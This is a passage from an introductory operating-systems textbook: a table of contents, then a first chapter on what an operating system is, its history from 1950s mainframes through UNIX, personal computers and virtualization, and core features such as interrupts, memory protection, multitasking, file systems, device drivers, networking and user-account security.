Chapter 1: Introduction to Operating System
• • • • What Is Operating System? History of Operating System Features Examples of Operating Systems

Chapter 2: Operating System Structure
• • • • • System Components Operating Systems Services System Calls and System Programs Layered Approach Design Mechanisms and Policies

Chapter 3: Process
• • • • • • • • • • Definition of Process Process State Process Operations Process Control Block Process (computing) Sub-processes and multi-threading Representation Process management in multi-tasking operating systems Processes in Action Some Scheduling Disciplines


Chapter 4: Threads
• • • • Threads Thread Creation, Manipulation and Synchronization User Level Threads and Kernel Level Threads Context Switch

Chapter 5: The Central Processing Unit (CPU)
• • • • • • • • • The Architecture of Mic-1 Simple Model of a Computer - Part 3 The Fetch-Decode-Execute Cycle Instruction Set Microprogram Control versus Hardware Control CISC versus RISC CPU Scheduling CPU/Process Scheduling Scheduling Algorithms

Chapter 6: Inter-process Communication
• • • • Critical Section Mutual Exclusion Proposals for Achieving Mutual Exclusion Semaphores

Chapter 7: Deadlock
• • • Definition Deadlock Condition Dealing with Deadlock Problem


Chapter 8: Memory Management
• • • About Memory Heap Management Using Memory

Chapter 9: Caching and Intro to File Systems
• • • • • • Introduction to File Systems File System Implementation An old Homework problem File Systems Files on disk or CD-ROM Memory Mapping Files

Chapter 10: Directories and Security
• • • • • • • • • Security Protection Mechanisms Directories Hierarchical Directories Directory Operations Naming Systems Security and the File System Design Principles A Sampling of Protection Mechanisms

Chapter 11: File System Implementation
• • • The User Interface to Files The User Interface to Directories Implementing File Systems

• • •

Node Software Levels Multiplexing and Arm Scheduling

Chapter 12: Networking
• • • Network Basic Concepts Other Global Issues


The operating system acts as a host for applications that are run on the machine. and receive the results of the operation. 5 . and even video game consoles. the user interface is generally considered part of the operating system. supercomputers. commonly pronounced “gooey”). For hand-held and desktop computers. pass parameters. it is responsible for the management and coordination of activities and the sharing of the limited resources of the computer. the user interface is generally implemented as an application program that runs outside the operating system. Windows. BSD and Solaris.) Common contemporary operating systems include Mac OS. Linux. By invoking these interfaces. embedded device markets are split amongst several operating systems. including handheld computers. desktop computers.CHAPTER 1 INTRODUCTION TO OPERATING SYSTEM What is Operating System? Operating system (commonly abbreviated to either OS or O/S) is an interface between hardware and user. On large multiuser systems like Unix and Unix-like systems. the application can request a service from the operating system. This relieves application programs from having to manage these details and makes it easier to write applications. Users may also interact with the operating system with some kind of software user interface (UI) like typing commands by using command line interface (CLI) or using a graphical user interface (GUI. (Whether the user interface should be included as part of the operating system is a point of contention. use an operating system of some type. Some of the oldest models may however use an embedded operating system. As a host. Applications access these services through application programming interfaces (APIs) or system calls. Almost all computers. Operating systems offer a number of services to application programs and users. one of the purposes of an operating system is to handle the details of the operation of the hardware. that may be contained on a compact disk or other data storage device. While servers generally run on Unix or Unix-like systems.

ensuring that unauthorized users do not access the system. and controlling peripheral devices such as disk drives and printers. Graphical user interfaces allow you to enter commands by pointing and clicking at objects that appear on the screen. respectively. but others are available. Your choice of operating system. such as DOS and UNIX. therefore. For example. The commands are accepted and executed by a part of the operating system called the command processor or command line interpreter. It is like a traffic cop -.it makes sure that different programs and users running at the same time do not interfere with each other.The most important program that runs on a computer. On the first computers. For large systems. such as recognizing input from the keyboard. the most popular operating systems are DOS. you normally interact with the operating system through a set of commands. are not real-time. and the necessary linkages for the control and synchronization of the computer's hardware. determines to a great extent the applications you can run. Some operating systems permit hundreds or even thousands of concurrent users. without an operating system. Multithreading: Allows different parts of a single program to run concurrently. General-purpose operating systems. called application programs. Every general-purpose computer must have an operating system to run other programs. sending output to the display screen. multiprocessing: Supports running a program on more than one CPU. and its own drivers for peripheral devices like printers and card-readers. The operating system is also responsible for security. keeping track of files and directories on the disk. As a user. the DOS operating system contains commands such as COPY and RENAME for copying files and changing the names of files. Operating systems can be classified as follows: • • • • • Multi-user: Allows two or more users to run programs at the same time. can run. every program needed the full hardware specification to run correctly and perform standard tasks. The application programs must be written to run on top of a particular operating system. OS/2. The growing complexity of hardware and application-programs eventually made operating systems a necessity 6 . such as Linux. the operating system has even greater responsibilities and powers. and Windows. History of Operating System The history of computer operating systems recapitulates to a degree the recent history of computer hardware. Operating systems (OSes) provide a set of functions needed and used by most applicationprograms on a computer. Operating systems perform basic tasks. Operating systems provide a software platform on top of which other programs. real time: Responds to input instantly. For PCs. multitasking: Allows more than one program to run concurrently.

were often called monitors or monitor-programs before the term OS established itself. capable of managing multistep processes. often on punched paper and tape. However. The user had sole use of the machine and would arrive armed with program and data. These resident background programs. This was the genesis of the modern-day operating system. it became possible for programmers to use symbolic program-code instead of having to hand-encode binary images. or batches of punch-cards stacked one on top of the other in the reader. clean up after it. disk storage used and for signaling when operator intervention was required by jobs such as changing magnetic tapes. and immediately go on to process the next job. leading eventually to the perception of an OS as a complete user-system with utilities. cards punched. which would be linked to the user's program to assist in operations such as input and output. It is said that Alan Turing was a master of this on the early Manchester Mark 1 machine. at Cambridge University in England the job queue was at one time a washing line from which tapes were hung with different colored clothes-pegs to indicate job-priority. and he was already deriving the primitive conception of an operating system from the principles of the Universal Turing machine. The program would be loaded into the machine. Eventually the runtime libraries became an amalgamated program that was started before the first customer job and could read in the customer job. An underlying program offering basic hardware-management. Run queues evolved from a literal queue of people at the door. The true descendant of the early operating systems is what is now called the "kernel". Automated monitoring was needed not just for CPU usage but for counting pages printed. from hand-held gadgets up to industrial robots and real-time control-systems. Later machines came with libraries of support code. they were supplanted by dedicated machine operators who looked after the well-being and maintenance of the machine and were less and less concerned with implementing tasks manually. applications (such as text editors and file managers) and configuration tools. All these features were building up towards the repertoire of a fully capable operating system. When commercially available computer centers were faced with the implications of data lost through tampering or operational errors. and having an integrated graphical user interface. software-scheduling and resource-monitoring may seem a remote ancestor to the user-oriented OSes of the personal computing era. more and more "secondary" software was bundled in the OS package. But there has been a shift in meaning. Programs could generally be debugged via a front panel using switches and lights. Where program developers had originally had access to run their own jobs on the machine. and the machine would be set to work until the program completed or crashed. In technical and development circles the old restricted sense of an OS persists because of the continued active development of embedded operating systems for all kinds of devices with a data-processing component. the time to run programs diminished and the time to hand off the equipment became very large by comparison. once task-switching allowed a computer to perform translation of a program into binary form before running it. Significantly. machines still ran a single job at a time. control its execution. Accounting for and paying for machine usage moved on from checking the wall clock to automatic logging by the computer. until the machine itself was able to select and sequence which magnetic tape drives were online. With the era of commercial computing. to a heap of media on a jobs-waiting table.Background Early computers lacked any form of operating system. equipment vendors were put under pressure to enhance the runtime libraries to prevent misuse of system resources. As machines became more powerful. cards read. which do 7 . record its usage.

IBM intended to develop also a single operating system for the new hardware. stopped the work on existing systems. operating procedures. Systems on IBM hardware: The state of affairs continued until the 1960s when IBM. OS/VS1. In the late 1970s. but has more sophisticated memory management and a time-sharing facility. produced in 1956 by General Motors' Research division for its IBM 704. MVT had several successors including the current z/OS. with each vendor or customer producing one or more operating systems specific to their particular mainframe computer. Every operating system. The problems encountered in the development of the OS/360 are legendary. TSO. each time the manufacturer brought out a new machine. Because of performance differences across the hardware range and delays with software development. PLATO was remarkably 8 . Early operating systems were very diverse. so that programs developed in the sixties can still run under z/VSE (if developed for DOS/360) or z/OS (if developed for OS/MFT or OS/MVT) with no change. and are described by Fred Brooks in The Mythical Man-Month—a book that has become a classic of software engineering. and most applications would have to be manually adjusted. IBM wound up releasing a series of stop-gaps followed by three longer-lived operating systems: • • OS/MFT for mid-range systems. even from the same vendor. DOS/360 for small System/360 models had several successors including the current z/VSE. OS/MVT for large systems. recompiled. Most other early operating systems for IBM mainframes were also produced by customers. and such facilities as debugging aids. and put all the effort into developing the System/360 series of machines. the KRONOS and later the NOS operating systems were developed during the 1970s. could have radically different models of commands. This was similar in most ways to OS/MFT (programs could be ported between the two without being re-compiled).not run user-applications at the front-end. This had one successor. Like many commercial timesharing systems. An embedded OS in a device today is not so far removed as one might think from its ancestor of the 1950s. for batch processing. the OS/360. which was discontinued in the 1980s. one of the pioneering efforts in timesharing and programming languages. In cooperation with the University of Minnesota. It was significantly different from OS/MFT and OS/MVT. which supported simultaneous batch and timesharing use. all of which used the same instruction architecture. there would be a new operating system. IBM maintained full compatibility with the past. which used plasma panel displays and long-distance time sharing networks. The mainframe era It is generally thought that the first operating system used for real work was GM-NAA I/O. its interface was an extension of the DTSS time sharing system. • • Other mainframe operating systems: Control Data Corporation developed the SCOPE operating system in the 1960s. a whole family of operating systems were introduced instead of a single OS/360. and retested. Typically. already a leading hardware vendor. The broader categories of systems and application software are discussed in the computer software article. Control Data and the University of Illinois developed the PLATO system.

innovative for its time. including TOPS-10 and TOPS-20 time sharing systems for the 36-bit PDP-10 class systems. produced a series of EXEC operating systems. By widespread use it exemplified the idea of an operating system that was conceptually the same across various hardware platforms. developed Multics and General Electric Comprehensive Operating Supervisor (GECOS). the first commercial computer manufacturer. when that language was ported to a new machine architecture UNIX was also able to be ported. and easily modified. Another system which evolved in this time frame was the Pick operating system. which introduced the concept of ringed security privilege levels. Early systems had utilized microprogramming to implement features on their systems in order to permit different underlying architecture to appear to be the same as others in a series. it was renamed to General Comprehensive Operating System (GCOS). TOPS-10 was a particularly popular system in universities. The case of 8-bit home computers and game consoles 9 . the shared memory model of PLATO's TUTOR programming language allowed applications such as real-time chat and multi-user graphical games. It still was owned by AT&T and that limited its use to groups or corporations who could afford to license it. it achieved wide acceptance. several hardware capabilities evolved that allowed similar or ported software to run on more than one system. such as being the first commercial implementation of virtual memory. and in the early ARPANET community. Prior to the widespread use of UNIX. easily obtainable. card readers and line printers. a dialect of ALGOL). In the 1970s. this was a batch-oriented system that managed magnetic drums. Other than that Digital Equipment Corporation created the simple RT-11 system for its 16-bit PDP-11 class machines. Like all early main-frame systems. disks. Burroughs Corporation introduced the B5000 in 1961 with the MCP (Master Control Program) operating system. Minicomputers and the rise of UNIX The beginnings of the UNIX operating system was developed at AT&T Bell Laboratories in the late 1960s. also patterned after the Dartmouth BASIC system. The system is an example of a system which started as a database application support program and graduated to system work. The Pick system was developed and sold by Microdata Corporation who created the precursors of the system. UNIVAC produced the Real-Time Basic (RTB) system to support large-scale time sharing. UNIVAC. Project MAC at MIT. and the VMS system for the 32-bit VAX computer. Since it was written in a high level C language. This portability permitted it to become the choice for a second generation of minicomputers and the first generation of workstations. MCP is still in use today in the Unisys ClearPath/MCP line of computers. In fact most 360's after the 360/40 (except the 360/165 and 360/168) were microprogrammed implementations. After Honeywell acquired GE's computer business. Digital Equipment Corporation developed many operating systems for its various computer lines. It also became a requirement within the Bell systems operating companies. In the late 1960s through the late 1970s. It became one of the roots of the open source movement. But soon other means of achieving application compatibility were proven to be more significant. working with GE. Because it was essentially free in early editions. MCP also introduced many other ground-breaking innovations. The B5000 was a stack machine designed to exclusively support high-level languages with no machine language or assembler and indeed the MCP was the first OS to be written exclusively in a high-level language (ESPOL.

) to be performed and sometimes disk formatting. like with the Commodore 64. such as CP/M or GEOS they could generally work without one. so an operating system's overhead would likely compromise the performance of the machine without really being necessary. along of course with application loading and execution. These operations require in general a functional OS on both platforms involved. some of them carried a minimal form of BIOS or built-in game. all have a minimal BIOS that also provides some interactive utilities such as memory card management. Sony had released a kind of development kit called the Net Yaroze for its first PlayStation platform. such as the ColecoVision. Modern day game consoles and videogames. starting with the PC-Engine. Even the available word processor and integrated software applications were mostly selfcontained programs which took over the machine completely. modified version of Microsoft Windows in the background. most if not all of these computers shipped with a built-in BASIC interpreter on ROM. Audio or Video CD playback. usually between 4 and 256 kilobytes. which sometimes required a non-trivial command sequence. such as the Commodore 64. Few of these cases. and 8-bit processors. Another reason is that they were usually single-task and single-user machines and shipped with minimal amounts of RAM. PC/MS/DR-DOS and beyond The development of microprocessors made inexpensive computing available for the small business and hobbyist. as also did video games. like the PlayStation. etc. it can be said that videogame consoles and arcade coin operated machines used at most a built-in BIOS during the 1970s. which is little more than a disguised Intel-based PC running a secret.Home computers: Although most small 8-bit home computers of the 1980s. with 64 and 128 being common figures. partly explains why a "true" operating system was not necessary. while from the PlayStation era and beyond they started getting more and more sophisticated. such as the Nintendo NES and its clones. copying. Game consoles and video games: Since virtually all video game consoles and arcade cabinets designed and built after 1980 were true digital machines (unlike the analog Pong clones and derivatives). the Amstrad CPC. would qualify as a "true" operating system. 1980s and most of the 1990s. allowing minimal file management operations (such as deletion. which also served as a crude operating system. There were however successful designs where a BIOS was not necessary. however. Furthermore. The personal computer era: Apple. and the Xbox game console. The most notable exceptions are probably the Dreamcast game console which includes a minimal BIOS. Long before that. but can load the Windows CE operating system from the game disk allowing easily porting of games from the PC world. copy protection and sometimes carry libraries for developers to use etc. which in turn led to the widespread use of interchangeable hardware 10 . ZX Spectrum series and others could use a diskloading operating system. In general. the Sega Master System and the SNK Neo Geo. there are Linux versions that will run on a Dreamcast and later game consoles as well. the Atari 8-bit. which provided a series of programming and developing tools to be used with a normal PC and a specially modified "Black PlayStation" that could be interfaced with a PC and download programs from it. The fact that the majority of these machines were bought for entertainment and educational purposes and were seldom used for more "serious" or business/science oriented applications. to the point of requiring a generic or custom-built OS for aiding in development and expandability. In fact.

The original GUI was developed at Xerox Palo Alto Research Center in the early '70s (the Alto computer system) and imitated by many vendors. virtual machine software today plays the role formerly held by the operating system. Executing a program involves the creation of a process by the operating system. such as the generic X Window System that is provided with many UNIX systems. establishing a priority for the process (in multi-tasking systems). but for microprocessor based system. and executing the program. gaining their own application programming interface. Over time. the hypervisor is no longer optional. where the operating system itself runs under the control of an hypervisor. The BIOS on the IBM-PC class machines was an extension of this idea and has accreted more features and functions in the 20 years since the first IBM-PC was introduced in 1981. and PCI buses). or allowing system administrators to manage the system. Features Program execution: The operating system acts as an interface between an application and the hardware. IBM introduced the notion of virtual machine. The rise of virtualization Operating systems were originally running directly on the hardware itself. Apple II. Microsoft's first Operating System. as exemplified by Hyper-V in Windows Server 2008 or HP Integrity Virtual Machines in HP-UX In some systems. such as POWER5 and POWER6-based servers from IBM. The kernel creates a process by assigning memory and other resources. the line between virtual machines monitors and operating systems was blurred: • • • • • Hypervisors grew more complex. In many ways. The user interacts with the hardware from "the other side". It was based on several Digital Equipment Corporation operating systems. The most important of the early OSes on these machines was Digital Research's CP/M-80 for the 8080 / 8085 / Z-80 CPUs. MS-DOS (or PC-DOS when supplied by IBM) was based originally on CP/M-80. SS-50. The program then interacts with the user and/or other devices performing its intended function. The operating system is a set of services which simplifies development of applications. loading program code into memory. ISA. and an increasing need for 'standard' operating systems to control them. memory management or file system Virtualization becomes a key feature of operating systems. The decreasing cost of display equipment and processors made it practical to provide graphical user interfaces for many operating systems. Commodore's AmigaOS.components using a common interconnection (such as the S-100. Each of these machines had a small boot program in ROM which loaded the OS itself from disk. 11 . memory. VMware popularized this technology on personal computers. applying scheduling policies. and provided services to applications. instead of being in direct control of the hardware. including managing the hardware resources (processor. was designed along many of the PDP-11 features. I/O devices). or other graphical systems such as Microsoft Windows. or even IBM's OS/2. Applications have been re-designed to run directly on a virtual machine monitor. M-DOS. mostly for the PDP11 architecture. the RadioShack Color Computer's OS-9 Level II/MultiVue. With VM/CMS on System/370. Apple's Mac OS.

not a good use of CPU resources. When a hardware device triggers an interrupt the operating system's kernel decides how to deal with this event. providing things like virtual memory addressing and limiting access to hardware in a manner determined by a program running in supervisor mode. when the operating system passes control to another program. This is analogous to placing a bookmark in a book when someone is interrupted by a phone call and then taking the call. by definition. bootloader and the operating system have unlimited access to hardware . 12 . it will trigger an interrupt to get the kernel's attention. When a computer first starts up. the term is used here more generally in operating system theory to refer to all modes which limit the capabilities of programs running in that mode. CPUs with this capability use two modes: protected mode and supervisor mode. If a program wishes to access hardware for example. causing control to be passed back to the kernel. However. The alternative is to have the operating system "watch" the various sources of input for events (polling) that require action -. it may interrupt the operating system's kernel. Similar modes have existed in supercomputers. although its protected mode is very similar to it. A user program may leave protected mode only by triggering an interrupt. which allow certain CPU functions to be controlled and affected only by the operating system kernel. which may be either part of the operating system's kernel.and this is required because. such as the virtual 8086 mode of the 80386 (Intel's x86 32-bit microprocessor or i386). In modern operating systems interrupts are handled by the operating system's kernel.Interrupts: Interrupts are central to operating systems as they provide an efficient way for the operating system to interact and react to its environment. A program may also trigger an interrupt to the operating system. The processing of hardware interrupts is a task that is usually delegated to software called device drivers. minicomputers. In this way the operating system can maintain exclusive control over things like access to hardware and memory. or both. Protected mode and supervisor mode: Modern CPUs support something called dual mode operation. and runs computer code previously associated with the interrupt. it can place the CPU into protected mode. CPUs might have other modes similar to 80286 protected mode as well. Interrupt-based programming is directly supported by most CPUs. The first few programs to run on the computer. and allow the programmer to specify code which may be run when that event takes place. How much code gets run depends on the priority of the interrupt (for example: a person usually responds to a smoke detector alarm before answering the phone). it is automatically running in supervisor mode. In protected mode. Interrupts may come from either the computer's hardware or from the running program. When an interrupt is received the computer's hardware automatically suspends whatever program is currently running. and mainframes as they are essential to fully supporting UNIX-like multi-user operating systems. being the BIOS. However. initializing a protected environment can only be done outside of one. programs may have access to a more limited set of the CPU's instructions. If a program wishes additional resources (or wishes to shed resources) such as memory. Even very basic computers support hardware interrupts. Here. which causes control to be passed back to the kernel. generally by running some processing code. Device drivers may then relay information to a running program by various means. part of another program. saves its status. The kernel will then process the request. Interrupts provide a computer with a way of automatically running specific code in response to events. protected mode does not refer specifically to the 80286 (Intel's x86 16-bit microprocessor) CPU feature.

Windows 3. Attempts to alter these resources generally causes a switch to supervisor mode. Cooperative memory management. certain protected mode registers specify to the CPU what memory address it should allow a running program to access. If a program fails it may cause memory used by one or more other programs to be affected or overwritten. which contain information that the running program isn't allowed to alter. allowing the operating system to use the same memory locations for multiple tasks. placing the kernel in charge. Windows systems use a swap file instead of a partition. but programs could easily circumvent the need to use it. and do not exceed their allocated memory. including memory segmentation and paging. All methods require some level of hardware support (such as the 80286 MMU) which doesn't exist in all computers.) Under UNIX this kind of interrupt is referred to as a page fault. With cooperative memory management it takes only one misbehaved program to crash the system. This part is known as swap space. each program must have independent access to memory. the kernel will generally resort to terminating the offending program. used by many early operating systems assumes that all programs make voluntary use of the kernel's memory manager. Various methods of memory protection exist. and will report the error.The term "protected mode resource" generally refers to one or more CPU registers. by killing the program). In most Linux systems. and since it is both difficult to assign a meaningful result to such an operation. This ensures that a program does not interfere with memory already used by another program.1-Me had some level of memory protection. since programs often contain bugs which can cause them to exceed their allocated memory. Attempts to access other addresses will trigger an interrupt which will cause the CPU to re-enter supervisor mode. giving them almost unlimited control over the computer. part of the hard disk is reserved for virtual memory when the Operating system is being installed on the system. Virtual memory: The use of virtual memory addressing (such as paging or segmentation) means that the kernel can choose what memory each program may use at any given time. If a program tries to access memory that isn't in its current range of accessible memory. 13 . Malicious programs. This system of memory management is almost never seen anymore. however the system would often crash anyway. or viruses may purposefully alter another program's memory or may affect the operation of the operating system itself. (See section on memory management. but nonetheless has been allocated to it. Memory management: Among other things. Since programs time share. and because it is usually a sign of a misbehaving program. a multiprogramming operating system kernel must be responsible for managing all system memory which is currently in use by programs. In both segmentation and paging. A general protection fault would be produced indicating a segmentation violation had occurred. the kernel will be interrupted in the same way as it would if the program were to exceed its allocated memory. Memory protection enables the kernel to limit a process' access to the computer's memory. This is called a segmentation violation or Seg-V for short. Under Windows 9x all MS-DOS applications ran in supervisor mode. where the operating system can deal with the illegal operation the program was attempting (for example.

6 allows all device drivers and some other parts of kernel code to take advantage of preemptive multi-tasking. Windows NT was the first version of Microsoft Windows which enforced preemptive multitasking. and in Linux. modern operating system kernels make use of a timed interrupt. sometimes on the order of 100ms or more in systems with monolithic kernels. 14 .) Kernel Preemption: In recent years concerns have arisen because of long latencies often associated with some kernel run-times. which allows the program access to the CPU and memory. In modern operating systems. as an area of memory can be used by multiple programs. it may execute for as long as it wants before explicitly returning control to the kernel. giving the appearance that it is performing the tasks at the same time.) On many single user operating systems cooperative multitasking is perfectly adequate. An operating system kernel contains a piece of software called a scheduler which determines how much time each program will spend executing. To accomplish this. this is generally done via time sharing. In this model. as home computers generally run a small number of well tested programs. (since Windows NT was targeted at professionals. The philosophy governing preemptive multitasking is that of ensuring that all programs are given regular time on the CPU. and what that memory area contains can be swapped or exchanged on demand. This implies that all programs must be limited in how much time they are allowed to spend on the CPU without being interrupted. This gives the kernel discretionary power over where a particular application's memory is stored. so that another program may be allowed to use the CPU. when control is passed to a program by the kernel. application memory which is accessed less frequently can be temporarily stored on disk or other media to make that space available for use by other programs.When the kernel detects a page fault it will generally adjust the virtual memory range of the program which triggered it. the introduction of the Windows Display Driver Model (WDDM) accomplishes this for display drivers. and in which order execution control should be passed to programs. An early model which governed the allocation of time to programs was called cooperative multitasking. Control is passed to a process by the kernel. At a later time control is returned to the kernel through some mechanism. (See above sections on Interrupts and Dual Mode Operation. Since most computers can do at most one or two things at one time. These latencies often produce noticeable slowness in desktop systems. Modern operating systems extend the concepts of application preemption to device drivers and kernel code. but it didn't reach the home user market until Windows XP. so that the operating system has preemptive control over internal run-times as well. and can prevent operating systems from performing time-sensitive operations such as audio recording and some communications. This so-called passing of control between the kernel and applications is called a context switch. the preemptable kernel model introduced in version 2. Multitasking: Multitasking refers to the running of multiple independent computer programs on the same computer. This is called swapping. which means that each program uses a share of the computer's time to execute. or even whether or not it has actually been allocated yet. This means that a malicious or malfunctioning program may not only prevent any other programs from using the CPU. but it can hang the entire system if it enters an infinite loop. A protected mode timer is set by the kernel which triggers a return to supervisor mode after the specified time has elapsed. granting it access to the memory requested. Under Windows Vista.

While many simpler operating systems support a limited range of options for accessing storage systems. and on the other end. Computers store data on disks using files. A connected storage device such as a hard drive is accessed through a device driver. which may contain one or more file systems. 15 . and ext2/3 and ReiserFS are available in Windows through FS-driver and rfstool). This makes it unnecessary for programs to have any knowledge about the device they are accessing. NTFS is available in Linux through NTFS-3g. regardless of their design or file systems to be accessed through a common application programming interface (API). contained within a hierarchical structure. size. making it very difficult for an operating system to support more than one file system. and close files. and enables files to have names and attributes. and the presence of various kinds of file attributes makes the implementation of a single interface for every file system a daunting task. and in the kinds of file names and directory structures they could use. case sensitivity. operating systems like UNIX and Linux support a technology known as a virtual file system or VFS. The device driver understands the specific language of the drive and is able to translate that language into a standard language used by the operating system to access all disk drives.Under Windows prior to Windows Vista and Linux prior to version 2. providing commands to and/or receiving data from the device. free space. The specific way in which files are stored on a disk is called a file system. A VFS allows the operating system to provide programs with access to an unlimited number of devices with an infinite variety of file systems installed on them through the use of specific device drivers and file system drivers. third party drives are usually available to give support for the most widely used filesystems in most general-purpose operating systems (for example. Disk access and file systems: Access to files stored on disks is a central feature of all operating systems.6 all driver execution was co-operative. Early file systems were limited in their capacity. open. They can create. On UNIX this is the language of block devices. Typically this constitutes an interface for communicating with the device. including access permissions. NTFS in Windows and ext3 and ReiserFS in Linux. for example. It also allows them to be stored in a hierarchy of directories or folders arranged in a directory tree. Various differences between file systems make supporting all file systems difficult. through the specific computer bus or communications subsystem that the hardware is connected to. However. in practice. and directories/folders. speed. meaning that if a driver entered an infinite loop it would freeze the system. Device drivers: A device driver is a specific type of computer software developed to allow interaction with hardware devices. Operating systems tend to recommend the use of (and so support natively) file systems specifically designed for them. and to make better use out of the drive's available space. These limitations often reflected limitations in the operating systems they were designed for. as well as gather various information about them. it can then access the contents of the disk drive in raw format. Early operating systems generally supported a single type of disk drive and only one kind of file system. higher reliability. Programs can then deal with these file systems on the basis of filenames. Allowed characters in file names. and creation and modification dates. An operating system like UNIX supports a wide array of storage devices. which are structured in specific ways in order to allow for faster access. When the kernel has an appropriate device driver in place. delete. A file system driver is used to translate the commands used to access each specific file system into a standard set of commands that the operating system can use to talk to all file systems.

This includes everything from simple communication. In theory a new device. and scanners using either wired or wireless connections. The operating system must be capable of distinguishing between requests which should be allowed to be processed. typically an operating system or applications software package or computer program running under the operating system kernel. Often a username must be quoted. The key design goal of device drivers is abstraction. A daemon. and each username may have a password. Protocols like ESound. This new driver will ensure that the device appears to operate as usual from the operating systems' point of view. such as SSH which allows networked users direct access to a computer's command line interface. which is controlled in a new manner. This means that computers running dissimilar operating systems can participate in a common network for sharing resources such as computing. To solve this problem. and Microsoft-specific protocols (SMB) on Windows. and others which should not be processed. OSes essentially dictate how every type of device should be controlled. Servers. offer (or host) various services to other network computers and users. might be used instead. Many operating systems support one or more vendor-specific or open networking protocols as well. It is a specialized hardware-dependent computer program which is also operating system specific that enables another program. To establish identity there may be a process of authentication. should function correctly if a suitable driver is available. Computers and their operating systems cannot be expected to know how to control every device. SNA on IBM systems. files. usually running UNIX or Linux. systems commonly have a form of requester identity. The function of the device driver is then to translate these OS mandated function calls into device specific calls.the requisite interfaces to the operating system and software applications. and to external devices like networks via the kernel. and usually provides the requisite interrupt handling necessary for any necessary asynchronous timedependent hardware interfacing needs. or esd can be easily extended over the network to provide sound from local applications. for example. Other methods of authentication. such as a user name. to interact transparently with a hardware device. hardware. such as magnetic cards or biometric data. which are available to software running on the system. Security: A computer being secure depends on a number of technologies working properly. printers. Every model of hardware (even within the same class of device) is different. Specific protocols for specific tasks may also be supported such as NFS for file access. and applications for using them. These services are usually provided through ports or numbered access points beyond the server's network address. Each port number is usually associated with a maximum of one running program. Networking: Currently most operating systems support a variety of networking protocols. to using networked file systems or even sharing another computer's graphics or sound hardware. called a server. Newer models also are released by manufacturers that provide more reliable or better performance and these newer models are often controlled differently. can in turn access the local hardware resources of that computer by passing requests to the operating system kernel. A modern operating system provides access to a number of resources. While some systems may simply distinguish between "privileged" and "non-privileged". Client/server networking involves a program on a computer somewhere which connects via a network to another computer. Some network services allow the resources of a computer to be accessed transparently. which is responsible for handling requests to that port. DECnet on systems from Digital Equipment Corporation. being a user program. Networks can essentially allow a computer's operating system to access the resources of a remote computer to support the same functions as it could if those resources were connected directly to the local computer. In some 16 . on a remote system's sound hardware. both now and in the future.

or carried out directly. and the only sandbox strategy available in systems that do not meet the Popek and Goldberg virtualization requirements. External requests are often passed through device drivers to the operating system's kernel. A software firewall can be configured to allow or deny network traffic to or from a service or application running on the operating system. Also covered by the concept of requester identity is authorization. one can install and be running an insecure service. and so were not true multi-user operating systems. However. the particular services and resources accessible by the requester once logged into a system and tied to either the requester's user account or to the variously configured groups of users to which the requester belongs. the first user account created during the setup process was an administrator account. both of a commercial and military nature. In addition.cases. where they can be passed onto applications. web sites. External security involves a request from outside the computer. but instead either emulates a processor or provides a host for a p-code based system such as Java. Most modern operating systems include a software firewall. are true multi-user. Therefore. they cannot be secured. and implement absolute memory protection. If programs can directly access hardware and resources. Security of operating systems has long been a concern because of highly sensitive data held on computers. Internal security is also vital if auditing is to be of any use. which was also the default for new accounts. These would allow tracking of requests for access to resources (such as. email. The Windows NT series of operating systems. Though Windows XP did have limited accounts. This became of vital importance to operating system makers. such as a login at a connected console or some kind of network connection. the majority of home users did not change to an account type 17 . The United States Government Department of Defense (DoD) created the Trusted Computer System Evaluation Criteria (TCSEC) which is a standard that sets basic requirements for assessing the effectiveness of security. such as Telnet or FTP. prior to Windows Vista. and not have to be threatened by a security breach because the firewall would deny all traffic trying to connect to the service on that port. At the front line of security are hardware devices known as firewalls or intrusion detection/prevention systems. or security from an already running program is only possible if all possibly harmful requests must be carried out through interrupts to the operating system kernel. and did not allow concurrent access. most of which can have compromised security. An alternative strategy. because the TCSEC was used to evaluate. In addition to the allow/disallow model of security. by contrast. as well as intrusion detection/prevention systems. there are a number of software firewalls available. print services. At the operating system level. is the operating system not running user programs as native code. "who has been reading this file?"). Internal security is especially relevant for multi-user systems. resources may be accessed with no authentication at all (such as reading files over a network share). a lot of the advantages of being a true multi-user operating system were nullified by the fact that. which is enabled by default. inclusive of bypassing auditing. they had no concept of access privileges. since a program can potentially bypass the operating system. they implemented only partial memory protection. storage and retrieval of sensitive or classified information. it allows each user of the system to have private files that the other users cannot tamper with or read. a system with a high level of security will also offer auditing options. especially connections from the network. They were accordingly widely criticised for lack of security. and file transfer protocols (FTP). Example: Microsoft Windows: While the Windows 9x series offered the option of having profiles for multiple users. classify and select computer systems being considered for the processing. Internal security. Network services include offerings such as file sharing.

a user's memory usage. and extended UFS. Should a user have to install software outside of his home directory or make system-wide changes. without being able to put any part of the system in jeopardy (barring accidental triggering of system-level bugs) or make sweeping. their total disk usage or quota. their selection of available programs. they must become the root user temporarily. Solaris Express. OpenSolaris. poolable. SUN Microsystems (Journaling) UFS. including the Windows Shell. what hardware they can access. SUN Microsystems (Clustering) QFS. Windows Vista changes this by introducing a privilege elevation system called User Account Control. This provides the user with plenty of freedom to do what needs to be done. are then started with the restricted token. The user's settings are stored in an area of the computer's file system called the user's home directory. programs running as a regular user are limited in where they can save files. using the user's own password for authentication instead of the system's root password. two separate tokens are assigned. When logging in as a standard user. a special user account on all UNIX-like systems. etc. The first token contains all privileges typically awarded to an administrator. resulting in a reduced privilege environment even under an Administrator account. In many systems. and errorcorrecting) ZFS. Solaris (as most Operating Systems based upon Open Standards and/or Open Source) defaulted to. a concept later adopted by Windows as the 'My Documents' folder. the new logon session is incapable of making changes that would affect the entire system. which is answered with the computer's root password when prompted. While the root user has virtually unlimited permission to affect system changes. and other Open Source variants of Solaris Operating System later supported bootable ZFS.with fewer rights – partially due to the number of programs which unnecessarily required administrator rights – and so most home users ran as administrator all the time. In this way. which is also provided as a location where the user may store their work. UAC will prompt for confirmation and. which limits any systemwide changes to the root user. Releases of Solaris 10. supported. Kernel extensions were added to Solaris to allow for bootable Veritas VxFS operation. 128 bit compressible. Solaris: The SUN Microsystems Solaris Operating System in earlier releases defaulted to (non-journaled or non-logging) UFS for bootable and supplementary file systems. 18 . Support for other file systems and significant enhancements were added over time. start the process using the unrestricted token. When logging in as a user in the Administrators group. available range of programs' priority settings. including Veritas Software Corp. if consent is given (including administrator credentials if the account requesting the elevation is not a member of the administrators group). Logging or Journaling was added to UFS in SUN's Solaris 7. a logon session is created and a token containing only the most basic privileges is assigned. and other functions can also be locked down. One is sometimes said to "go root" or "drop to root" when elevating oneself to root access. Example: Linux/Unix: Linux and UNIX both have two tier security. and the second is a restricted token similar 